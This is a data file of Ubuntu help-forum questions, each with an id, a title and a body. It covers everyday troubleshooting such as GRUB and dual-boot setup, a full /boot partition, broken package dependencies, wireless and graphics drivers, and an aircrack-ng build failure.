263281	problem linking wlan to ethernet	so i 've been trying to use a laptop who 's wifi card does n't work properly , by using a lenovo v570 laptop with ubuntu 12.04 to bridge the two networks . i changed my ethernet network to `` shared to other computers '' through network manager , but it still refuses to work . i believe the issue may be in my /etc/network/interfaces , as i did edit it at one point and forgot to make a backup . here is what mine currently consists of : auto lo iface lo inet loopback if someone could post their ( stock ) /etc/network/interfaces file , i could try with that . thanks a lot !
263283	a program for creating liveusb	do you know any program which works on linux like unetbooting thanks
263286	how to give public_html to each user ?	i have a new installation of ubuntu 12.04 and i want to have 2 or more users be able to test with apache/php/mysql . within default config at sites-available i added two different virtualhosts , one for each user lets say : /home/user1/public_html and /home/user2/public_html now i can view the index.php from the user1 at localhost/index.php but i ca n't do the same for user2 . i know there must be a way but i dont know how to google search for it . any ideas or maybe point me to the correct direction ? ps : guess the title is n't accurate but i could't think any better
263294	grub loads up when i only have ubuntu installed	i 've installed ubuntu successfully after trying four times due to it hanging frequently during installation . ( having the screen go wild ) so i tried for the fourth time installing via removing the first three installations and reinstall ubuntu 12.10 without internet connection so it quits getting files during installation . i 've finally installed ubuntu but when i booted back it loads the grub boot since i have 100 mb partitioned from my previous windows installer . it 's suppose to be a system reserved partition for it 's boot so i guess ubuntu sees that and made it like i 'm dual booting . but i have only ubuntu installed and i do n't know how to just boot to ubuntu without going through grub . so i re-install ubuntu ? if so how should i go with the installation . now i 've formatted the disk that has the system reserved and it 's just a blank ntfs disk . speaking of which i should probably add this question too . sata does n't have that master drive/slave hierarchy that tells that this disk is the main and the other not right ? how does it always detects my storage disk as the main and it always insist that i install ubuntu there . even when installing windows 7 it always has to make a boot partition on that disk when i did n't ask it too . please help , thanks
263296	dual boot and grub	this is my third question . i have installed ubuntu on my pc now , but what i did when installing is i unplugged all my hdd 's except for the one i wanted to install ubuntu on . ( i wanted to be sure i wasnt erasing anything , at first i wanted to install with all the drives in , but the ubuntu installer is vague when it comes to highlighting which drive i am actually installing to i found , you lot might disagree , so i shut down the install and unplugged all my drives except for the on i wanted to install on to ) so , i installed ubuntu . turned off the pc , then i pluggged the other hdd back in to the pc and re-booted . it loaded ubuntu with out giving me the option to choose which os . so i went to bios changed the boot to boot from my windows drive and here i am now asking ... how do i install grub or get it to work after i have installed ubuntu and re-plugged back in my windows drive ? or am i dammed to have to switch the boot on bios ?
263312	cofiguring a netgear wnda3100 usb adapter	i recently just installed ubuntu 12.10 . everything was going well and i really enjoyed it , so much that i installed it on my desktop , however my desktop does not have a built-in wireless card , so instead i 'm using a usb adapter . when i installed ubuntu though , it does not have the proper software to recognize and run the adapter , therefore i can not connect to the internet . i did some research and many pointed to `` ndiswrapper '' and how i should use that , after going through many other steps ( which i do n't know how to do either ) , and it should work ! well ... as i do n't have internet access via that computer , i 've been trying to use a usb drive ; downloading the 'tar.gz ' files , but i can not get them onto my other system because when i 'copy and paste ' the supposed file , nothing happens , therefore i ca n't even begin the other steps appropriately . i need any help as to how to get the necessary files on my pc without internet access , via usb drive then i need to proper steps as to how to install ndiswrapper and whatever files i 'll need for my netgear wnda3100 usb adapter
263316	`` different filesystems on the same disk '' issue on community ubuntu documentation guide	reading the partitioning/home/moving guide ( about to move my /home to a different partition ) , i came across this notice : if you 're moving from windows and your new home partition is going to be an old ntfs partition ( the d : disk ) while you convert the c : disk to a journaling partition where you install linux , this wo n't work , there will be a huge load on the processor . you should convert the two partitions to ext3 or ext4 or keep both partitions as ntfs ( i have n't checked this last option ) . but working with two different filesystems on the same drive simultaneously does n't seem to be a good option . is this true ? i mean , i know a lot of people ( myself included ) dual boot some sort of windows on one hard drive ( which will mean at least one partition will be ntfs ) .
263318	location of trash icon in unity launcher	after i boot my laptop , i see a 'space ' between workspace switcher and trash on the launcher . this is the screenshot : how do i solve this ?
263320	could n't find package git	so i am trying to install git with the following command as listed on the git linux download page : sudo apt-get install git after that command i get the following error : reading package lists ... done building dependency tree reading state information ... done e : could n't find package git i am running ubuntu 10.04 ( as that is the recommended version for android build environment ) . i am pretty new to linux so any help would be appreciated . thanks
263326	is it fully possible to install ubuntu on a `` slave hdd '' , by using wubi , i 've windows 7 as primary hdd ?	is it fully possible to install ubuntu on a slave hdd , by using wubi , i 've windows 7 as primary hdd ? i mean will wubi installation go normal on `` slave hdd '' , like no blue screens of death , or any mishappenings n accidents like data loss etc.. i 've hdd structure of 2 x 1tb of 2 hdds . disk0 c : windows 7 - 40gb d : store ( for data n all ) - 891 gb disk1 e : hdd1 - ( for backups mostly ) - 931gb now what i want is to make a 30gb partition from e : ( disk 1 `` slave '' ) and install ubuntu there using wubi . so will wubi be able to install ubuntu on `` slave hdd '' normally , without any fatal mishappenings or accidents or ny kind data loss .
263329	stylus eraser not distinguished from pen tip	i have an hp tc4400 convertible tablet , which has a stylus with eraser . $ xsetwacom list serial wacom tablet stylus id : 11 type : stylus serial wacom tablet eraser id : 13 type : eraser the stylus and eraser worked properly for a long time , but recently there has been some strange behaviour that i do n't understand . when i run xournal with its `` eraser tip '' option as i used to ( which is supposed to cause the eraser of the stylus to be treated differently from the other end ) , then both ends of the pen are interpreted as the eraser . i tried to deal with this by using xsetwacom to map the eraser to something different from the stylus . however , while the following line does make touching the eraser to the screen like a right click , it also makes the other end of the pen act like a right click as well : xsetwacom set `` serial wacom tablet eraser '' button 1 3 i would have expected that setting properties of the eraser would not alter the stylus at all . any ideas of what is going on and how i can fix it ?
263331	how can i type the `` at '' @ symbol on a spanish keyboard ?	i just finished installing ubuntu on my amd athlon , but i can not type the `` at '' sign . i 'm from peru and my keyboard is spanish . i have tried using alt+64 , ctrl+alt+2 , ctrl+alt+q , but nothing happens . please help .
263332	how can unicode symbols u+2404 ␄ eot and u+2405 ␅ enq be corrected ?	the title above is rendered incorrectly in ubuntu 12.04 as : the unicode title identifications are correct for the codes but the symbols are switched . eot ␄ is the same as control-d but unfortunately the wrong symbol is used . ( likewise enq ␅ control-e ) references : askubuntu : how do i complete the gnome character map with missing unicode characters ? found an error in font in ubuntu , where and how should i report it ? escalation info not pursued . is there a more immediate solution ? how can i configure default fonts by unicode blocks or single codepoints ? an answer to this question would provide some remedial info . curios - interesting asides : superuser : producing a specific ascii character in ubuntu askubuntu : how can i type ascii characters like alt+numpad in windows ? ways to enter special characters ? is alt+numpad possible ? alt + ascii code like in windows what feature is at play when ctrl+shift+alt+u , e `` types '' an unprintable hex 000e ? note : the glyph code u+240e ␎ ( which also is wrong ! ) is used when referring to u+000e aka so ( shift out ) or control-n , basically any control code is rendered as a symbol by adding 2400hex to the control code to get the equivalent unicode glyph . how can i type special characters like ë ? wikipedia : wikipedia article on shift out and shift in `` characters '' wikipedia control code chart showing associated glyphs compare the chart 's enquiry enq , end of transmission eot and shift out so character symbols on a machine which renders them correctly ( ie . not a stock ubuntu 12.04 os machine ) , with u+2404 , u+2405 & u+240e in character map ( run it from the utility icon or use a terminal command : gucharmap or gnome-character-map ) . enquiry symbol end of transmission symbol also the u+240e glyph is wrong for shift out , so , ^n , u+000e can these be easily fixed ?
263333	get back command prompt after opening programs from terminal	when i launch any application from terminal , then the terminal gets locked until i close that application . what i want is just to use terminal for launching programs and then use the same terminal for other purpose without closing that application . i googled up and found that one solution is running the process in background like gedit & is n't there any other way by which i only type `` gedit '' and then return to command prompt ? because i have seen such use in fedora terminal . how is it done in fedora by default ? thank you .
263334	fail to log in ubuntu for deleting my home folder	i moved my home folder ( `` huangzhiwu '' ) to /usr/share carelessly . then after i noticed that , i make a new folder named huangzhiwu in /home , and moved all files from /usr/share/huangzhiwu to the new home folder /home/huangzhiwu . but when i log in again , it failed , that means i can not log in . what should i do ? thank you for help !
263340	is there any photo editing software like adobe photoshop ?	i want to blur images , edit photos and use layers just like in adobe photoshop for windows .
263346	aircrack-ng installation error	i want to install aircrack-ng tool on my ubuntu 12.04 but i found errors while installation when i give command make i got this '' nosha @ nosha-inspiron-n4050 : ~/aircrack-ng-1.1 $ make make -c src all make [ 1 ] : entering directory `/home/nosha/aircrack-ng-1.1/src' make -c osdep make [ 2 ] : entering directory `/home/nosha/aircrack-ng-1.1/src/osdep' building for linux make [ 3 ] : entering directory `/home/nosha/aircrack-ng-1.1/src/osdep' gcc -g -w -wall -werror -o3 -d_file_offset_bits=64 -d_revision=0 -fpic -i.. -c -o linux.o linux.c linux.c : in function ‘is_ndiswrapper’ : linux.c:165:17 : error : variable ‘unused’ set but not used [ -werror=unused-but-set-variable ] linux.c : in function ‘linux_set_rate’ : linux.c:334:22 : error : variable ‘unused’ set but not used [ -werror=unused-but-set-variable ] linux.c : in function ‘linux_set_channel’ : linux.c:807:22 : error : variable ‘unused’ set but not used [ -werror=unused-but-set-variable ] linux.c : in function ‘linux_set_freq’ : linux.c:896:22 : error : variable ‘unused’ set but not used [ -werror=unused-but-set-variable ] linux.c : in function ‘set_monitor’ : linux.c:1022:22 : error : variable ‘unused’ set but not used [ -werror=unused-but-set-variable ] linux.c : in function ‘do_linux_open’ : linux.c:1366:12 : error : variable ‘unused_str’ set but not used [ -werror=unused-but-set-variable ] linux.c:1352:15 : error : variable ‘unused’ set but not used [ -werror=unused-but-set-variable ] linux.c : in function ‘get_battery_state’ : linux.c:1982:35 : error : variable ‘current’ set but not used [ -werror=unused-but-set-variable ] cc1 : all warnings being treated as errors make [ 3 ] : *** [ linux.o ] error 1 make [ 3 ] : leaving directory `/home/nosha/aircrack-ng-1.1/src/osdep' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/nosha/aircrack-ng-1.1/src/osdep' make [ 1 ] : *** [ osd ] error 2 make [ 1 ] : leaving directory `/home/nosha/aircrack-ng-1.1/src' make : *** [ all ] error 2
263351	ca n't run ubuntu 12.04 problem seems to be video driver , card is via s3 pro savage 4	i start `` run ubuntu from this usb '' and it loads and shows ubuntu dots screen but when this finish the screen does n't show welcome screen or anything else and i need to force shutdown with power button
263353	display album year in rhythmbox	in rhythmbox songs list , it is showing the columns track , title , genre , artist , album and time . i want to have year field . how to get that ?
263355	how to fix dual graphic card problem ? nvidia and intel	i recently installed ubuntu alongside with windows 8 , but the problem is that the fan is constantly running and i believe the problem is that my nvidia card is always running . my laptop has two graphic cards . intel graphics 3000 and nvidia gt540m . i would like to only use intel card , and nvidia only during games and such . if anything iâm okay with disabling nvidia card , because i can play games on windows 8 . thanks .
263359	i am new to linux os..i want to know which one to start with as of now..ubuntu 12.04 or fedora 18 gnome ? please help	please help me to choose between ubuntu and fedora 18
263363	how can i remove old kernels/install new ones when /boot is full ?	i know this question is asked many times before , however with me it is just a bit different i guess . # df -h filesystem size used avail use % mounted on /dev/sda3 224g 5.2g 208g 3 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 777m 260k 777m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 0 1.9g 0 % /run/shm /dev/sda2 90m 88m 0 100 % /boot /dev/sda6 1.9g 514m 1.3g 29 % /tmp my boot partition is full . current kernel : # uname -r 3.2.0-35-generic all kernels : # dpkg -- list | grep linux-image ii linux-image-3.2.0-32-generic 3.2.0-32.51 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-34-generic 3.2.0-34.53 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-35-generic 3.2.0-35.55 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-37-generic 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-38-generic 3.2.0-38.60 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-generic 3.2.0.37.45 generic linux kernel image so i thought of removing the 3.2.0.32-generic kernel with : # sudo apt-get purge linux-image-3.2.0-32-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.37.45 ) but 3.2.0.38.46 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . no success . when i try apt-get -f install it also fails : # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-34 linux-headers-3.2.0-35 linux-headers-3.2.0-34-generic linux-headers-3.2.0-35-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-generic linux-image-generic the following packages will be upgraded : linux-generic linux-image-generic 2 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . 5 not fully installed or removed . need to get 0 b/4,334 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-37-generic ( 3.2.0-37.58 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-38-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic update-initramfs : generating /boot/initrd.img-3.2.0-37-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-37-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-37-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-37-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-3.2.0-38-generic ( 3.2.0-38.60 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-37-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-38-generic /boot/vmlinuz-3.2.0-38-generic update-initramfs : generating /boot/initrd.img-3.2.0-38-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-38-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-38-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-38-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-37-generic ; however : package linux-image-3.2.0-37-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.37.45 ) ; however : package linux-image-generic is not configured yet . linux-generic depends on linux-headers-generic ( = 3.2.0.37.45 ) ; however : version of linux-headers-generic on system is 3.2.0.38.46. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already update-initramfs : generating /boot/initrd.img-3.2.0-35-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-35-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-37-generic linux-image-3.2.0-38-generic linux-image-generic linux-generic initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help would really be appreciated . update : i did : sudo rm /boot/*-3.2.0-32-generic /boot/*-3.2.0-34-generic after that the following problem with apt-get -f install : root @ localhost : / # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-generic the following packages will be upgraded : linux-generic 1 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . 1 not fully installed or removed . need to get 0 b/1,722 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.37.45 ) ; however : version of linux-image-generic on system is 3.2.0.38.46. linux-generic depends on linux-headers-generic ( = 3.2.0.37.45 ) ; however : version of linux-headers-generic on system is 3.2.0.38.46. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
263364	i do n't have a volume taskbar icon & keyboard shortcuts not doing anything	i do n't have a volume shortcut to my taskbar . when i use my logitech 's vol+ and vol- keys , i see the transparent popup icon but the actual volume is not changing . i tried experimenting with pulseaudio but i could n't get it to show a shortcut icon on my taskbar . here 's my uname : linux g-on-linux 3.5.0-25-generic # 39-ubuntu smp mon feb 25 18:26:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux xubuntu 12.10 xfce4.10
263366	stop banshee from autostarting	i thought it would be good if cds and usb sticks would play on insertion ( banshee ) , but on insertion it now plays whenever there is any music on the stick or disc . it is better when it asked to play . where do i make this setting ?
263371	how to to use one instance of mysql database in a dual boot setup	i have a duel boot machine having windows and ubuntu 12.10 . i was using mysql database in my windows machine and now want to use it form ubuntu . i installed mysql in ubuntu and set datadir . as mentioned in this post , i changed /etc/apparmor.d/local/usr.sbin.mysqld also . still when i run the command sudo service mysql start , i 'm getting the error start : job failed to start the command dmesg | grep mysql is showing the output . > [ 9766.942099 ] type=1400 audit ( 1362299426.097:88 ) : apparmor= '' status '' > operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=6097 > comm= '' apparmor_parser '' [ 9766.953873 ] init : mysql main process ( 6101 ) > terminated with status 1 [ 9766.953895 ] init : mysql main process > ended , respawning [ 9766.957071 ] init : mysql post-start process ( 6102 ) > terminated with status 1 [ 9766.963364 ] type=1400 > audit ( 1362299426.117:89 ) : apparmor= '' status '' > operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=6117 > comm= '' apparmor_parser '' [ 9766.974864 ] init : mysql main process ( 6121 ) > terminated with status 1 [ 9766.974883 ] init : mysql main process > ended , respawning [ 9767.979418 ] init : mysql post-start process ( 6122 ) > terminated with status 1 [ 9767.987662 ] type=1400 > audit ( 1362299427.145:90 ) : apparmor= '' status '' > operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=6145 > comm= '' apparmor_parser '' [ 9768.003272 ] init : mysql main process ( 6149 ) > terminated with status 1 [ 9768.003291 ] init : mysql respawning too > fast , stopped how can i use the existing data file in ubuntu ? any clues ?
263373	detailed tutorial for quickly and python for app development ?	where can i get a complete reference for ubuntu app development using quickly and python ? i saw the video at http : //developer.ubuntu.com/get-started/ but that shows only how to use a text field and button .
263374	ubuntu in vagrant , apt-get update failed	i set a vagrant vm , and try to apt-get update , get this fetched 1,358 kb in 1min 19s ( 17.1 kb/s ) w : gpg error : http : //us.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //us.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch bzip2 : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_restricted_source_sources hash sum mismatch after searching the topic , all the solution do n't work.i 'm not sure whether is about vagrant or ubuntu itself .
263376	manager accounting signup issue	i installed an accounting software manager in ubuntu 12.10 and in signup , it is giving the below error . how to get rid of this ? atal error : system.typeinitializationexception : an exception was thrown by the type initializer for servicestack.text.json.jsonwriter1 -- - > system.typeinitializationexception : an exception was thrown by the type initializer for servicestack.text.json.jsonwriter -- - > system.io.filenotfoundexception : could not load file or assembly 'system.data.linq , version=3.5.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . file name : 'system.data.linq , version=3.5.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' at servicestack.text.json.jsonwriter..cctor ( ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - -- - end of inner exception stack trace -- - at servicestack.text.jsonserializer.serializetostring [ < > f__anonymoustype83 ] ( . < > f_anonymoustype83 value ) [ 0x00000 ] in < filename unknown > :0 at servicestack.text.stringextensions.tojson [ < > f__anonymoustype83 ] ( . < > f_anonymoustype8`3 obj ) [ 0x00000 ] in :0 at manager.webservices.register ( system.string name , system.string email , system.string password ) [ 0x00000 ] in :0 at manager.httphandlers.register.post ( ) [ 0x00000 ] in :0 at httpframework.httpmodule.processrequest ( httpframework.httprequest request ) [ 0x00000 ] in :0 at manager.httpmodule.processrequest ( httpframework.httprequest request ) [ 0x00000 ] in :0
263377	radeon driver install help on ubuntu	i have a amd/ati radeon 7800 series vga card . i looked up ow to install the drivers under ubuntu but could not work out how to do it . i want to install the proprietary fglrx driver . the guide i followed was this one . i used the : 2 . installation via the ubuntu repositories it said to get the fglrx-installer i downloaded it ( i was n't even sure if was the correct one , i got 2:9.000-0ubuntu3 which stated it was the stable release . ) when i clicked on that it took me to this page : fglrx driver download ubutu on this page it gave me 3 more download options . i choose the first one : download files from current release ( 2:9.000-0ubuntu3 ) fglrx-installer_9.000.orig.tar.gz ( 106.7 mib ) fglrx-installer_9.000-0ubuntu3.debian.tar.gz ( 42.2 kib ) fglrx-installer_9.000-0ubuntu3.dsc ( 1.5 kib ) i assume the first one was the correct one . now how do i install it ? the guide says to use the hardware drivers manager , but i can not find it . so basically , i 'm asking if i have the correct files ? secondly where is the hardware drivers manager , and once i find that how do i install the driver for the card ? unless someone has another way of doing it that is easier ?
263378	how to fix dependencies / broken packages	i 'm new to ubuntu , i like to use it but i 'm not able to resolve the problem . when i try to install skype , phpmyadmin and even i got the error on system updates . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libc6 : depends : libgcc1 but it is not going to be installed depends : tzdata but it is not going to be installed libc6-dev : depends : libc-dev-bin ( = 2.15-0ubuntu10.3 ) depends : linux-libc-dev but it is not going to be installed recommends : gcc but it is not going to be installed or c-compiler skype : i386 : depends : libasound2 : i386 ( > = 1.0.16 ) but it is not going to be installed depends : libc6 : i386 ( > = 2.3.6-6~ ) but it is not going to be installed depends : libc6 : i386 ( > = 2.7 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.1.0~2011week13 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxv1 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . what will i have to do ? please help .
263381	can i recover emptied file ?	carelessly i emptied my text file textfile by the command cat > textfile nonexistfile instead of cat textfile > nonexistfile , so is there any method to get the data back ?
263388	how to run openmpi on virtualbox with 3 pcs through ssh ?	i have 3 pcs with vista , running ubuntu through virtualbox on them . i have installed openmpi and ssh on them , they are connected via ethernet . the ip addresses are all 10.0.2.15 . and i can ping with my windows ip address . but the problem is that when i type : ssh x.x.x.x i receive this error : ssh : connect to host x.x.x.x port 22 : connection timed out . i 'd be glad if someone could help me !
263392	share internet ( with same ip address )	i am currently housing in a place that allows only a limited number of devices connected to the internet . problem : i have more devices than allowed . so i have one ubuntu machine which is connected via ethernet and now i would like to share it 's connection , but without that the connected device generates an new ip ( via dhcp ) and thus wouldnt count up against the limit . available interfaces : wifi and bluetooth . i want the devices connected to my ububtu machine to go out to the internet as the ubuntu machine . what technologies / protocols / permit this ? forgive me if it is a stupid question , but i dont understand well all the different networking technologies . thanks a lot already for any hint ! !
263393	where would i find google ime for marathi language ?	i need to type in marathi on ubuntu . where would i find google ime for marathi language .
263394	phonon test of speakers `` front left '' , `` front right '' is not working	i am using kde 4.10 , kubuntu 13.04 . my audio is working great . but when i configure phonon and try to test the speakers , i do n't get any sound . when i start the configuration tool with : kcmshell4 kcm_phonon and press the `` front left '' or `` front right '' button , i get this error message : alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm 0 maybe the tool simply fails to load the wav test file ? where are they supposed to be located ?
263395	how to stop a ( video ) stream in totem ?	i 've found a stream which wo n't play on vlc ( otherwise my standard player ) , but will do so in totem ( playing not in browser but externally ) . i 'm a bit puzzled about the non-existant stop-button in totem ; apparently , i 'm not the only one . i stumbled ( googled ) upon this which does n't refer to totem 's current release ( 3.0.1 is installed on my system ) but in any case lists two functions totem_remote_command_stop stop playing the current stream totem_action_stop ( ) stops the current stream and a warning : unstable , unless otherwise indicated ... oh , and i 'm also confused by the exact ( or relevant ) difference between totem and mplayer , as they seem to be more or less the same thing ... are they ? assuming they 're more or less the same , this lists q / esc stop playing and quit but that 's not what i 'm after : i only want to stop the stream , not quit the application ... ~.~.~ ps : with the currently installed kernel ( standard precise kernel , anyway < 3.5 and 3.6 , will look more closely into this , some time soon ) my external sk-8855 `` thinkvantage '' keyboard succeeds in communicating with the fn play/pause key combinations effecting a play-pause-toggle ; but again , unfortunately , the fn stop does not effect a stop , but rather just a pause ... two things are worth noting : this only works with totem ( not with vlc ) surprisingly ( and i think that 's a pretty neat feature ! ! ) , totem responds to the fn commands from all workspaces ; that is , also when totem is out of focus and out of sight .
263402	how does ubuntu one work ?	excuse me for my very stupid question . i just wan na know this : if i `` upload '' something on ubuntu one and then i delete it from my computer , that file still is in ubuntu one or just go away it too ? because in ubuntu one you synchronize a folder ( or more ) . so does every modify in that folder affect what there is on ubuntu one , or not ? i 'd like to have a service that allows me to put , for example , my first year university material on the web and delete it from my pc . do you know how can i do that ?
263405	all packages keep unmeting dependencies all the time	all problems begin when i was trying to install graphics card driver . my desktop wanished . i paniced and reinstalled ( with apt-get ) a lot of packages including ubuntu desktop , unity , xserver , etc . i solved the problems with missing desktop and sidebar but from that day on i keep getting following errors when i try to install almost anything using apt-get install . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : totem : depends : totem-common ( = 3.0.1-0ubuntu21 ) but 3.0.1-0ubuntu21.1 is to be installed recommends : totem-plugins but it is not going to be installed recommends : totem-mozilla but it is not going to be installed e : unable to correct problems , you have held broken packages . what went wrong and what to do to get the apt-get install working again ? i would try to fix dependencies by apt-get removeing problematic things and then apt-get install the thinks i want . but it wants me to uninstall a lot of things . following the unmet dependencies i got to package libgnutls26 . sudo apt-get remove libgnutls26 writes following reading package lists ... building dependency tree ... reading state information ... the following packages were automatically installed and are no longer required : libopenal1 : i386 libjna-java libsdl-ttf2.0-0 jsvc libdb5.1-java-gcj libdb-je-java libxfixes3 : i386 junit4 gcj-4.6-jre-lib ttf-umefont libboost-filesystem1.46.1 libecj-java libgraphicsmagick3 libtorque2 libogre-1.7.4 libxcomposite1 : i386 liboro-java libldap-2.4-2 : i386 libv4l-0 : i386 libjoda-time-java libnb-javaparser-java gnome-exe-thumbnailer eclipse-platform-data libroken18-heimdal : i386 gcj-4.6-base libxerces2-java libcxsparse2.2.3 libgphoto2-port0 : i386 libgcj-bc libemma-java libfreeimage3 libjtidy-java libjzlib-java libglpk0 libarpack2 libpg-java libicu4j-java libcholmod1.7.1 libaspectj-java libfreemarker-java libservlet2.4-java libswt-cairo-gtk-3-jni libcommons-beanutils-java libosgi-compendium-java libbetter-appframework-java libsane : i386 junit odbcinst1debian2 libsdl-mixer1.2 cmake-data libtinyxml2.6.2 libxxf86vm1 : i386 bsh-gcj libboost-system1.46.1 libsac-java-gcj libdb-java libgl1-mesa-dri : i386 empathy-common libxcb-glx0 : i386 libasn1-8-heimdal : i386 libnb-platform-devel-java libgl1-mesa-glx : i386 libwebkitgtk-1.0-common libgeronimo-jpa-2.0-spec-java libapr1 libxslt1.1 : i386 javahelp2 libcommons-cli-java libcapi20-3 libcapi20-3 : i386 libx11-xcb1 : i386 libcglib-java libglapi-mesa : i386 libumfpack5.4.0 libcommons-logging-java odbcinst jetty libgssapi3-heimdal : i386 libcommons-compress-java libcegui-mk2-0.7.5 libv4lconvert0 : i386 apache2-utils libgcj12 libccolamd2.7.1 libdb5.1-java unixodbc libbytelist-java libsimple-validation-java libicu4j-4.4-java libsvnkit-java libfelix-framework-java libjavascriptcoregtk-1.0-0 smc-data libosgi-foundation-ee-java libnb-platform13-java ant wine-gecko1.4 wine-gecko1.4 : i386 libstringtemplate-java libwind0-heimdal : i386 aspectj libjsch-java bsh libparpack2 libeasymock-java winetricks jarwrapper libxml-commons-resolver1.1-java libfltk1.1 ant-optional libxinerama1 : i386 libsilly libgif4 : i386 libsac-java libjcodings-java dkms libapache-pom-java libcolamd2.7.1 libopenmpi1.3 libxml-commons-external-java icoutils libosgi-core-java libieee1284-3 : i386 libgraphicsmagick++3 libhdf5-serial-1.8.4 octave3.2-common libflute-java sat4j libantlr-java libcommons-el-java libjvyamlb-java libnb-org-openide-util-java libboost-thread1.46.1 libtrilead-ssh2-java libxpm4 : i386 libusb-0.1-4 : i386 libzzip-0-13 libcommons-httpclient-java libfelix-main-java libhcrypto4-heimdal : i386 libhx509-5-heimdal : i386 libgd2-xpm : i386 libheimbase1-heimdal : i386 libslf4j-java libcommons-daemon-java libnuma1 